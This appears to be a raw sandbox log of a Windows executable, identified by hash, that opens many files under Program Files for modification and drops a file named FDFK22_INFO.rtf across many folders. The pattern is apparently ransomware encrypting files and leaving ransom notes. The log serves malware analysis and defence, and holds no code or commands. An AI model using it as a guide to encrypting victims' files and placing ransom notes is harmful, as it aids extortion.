a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\external_extensions.json a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\deploy\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Mail\wab.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands_3.6.100.v20140528-1422.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_100_percent.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\FDFK22_INFO.rtf 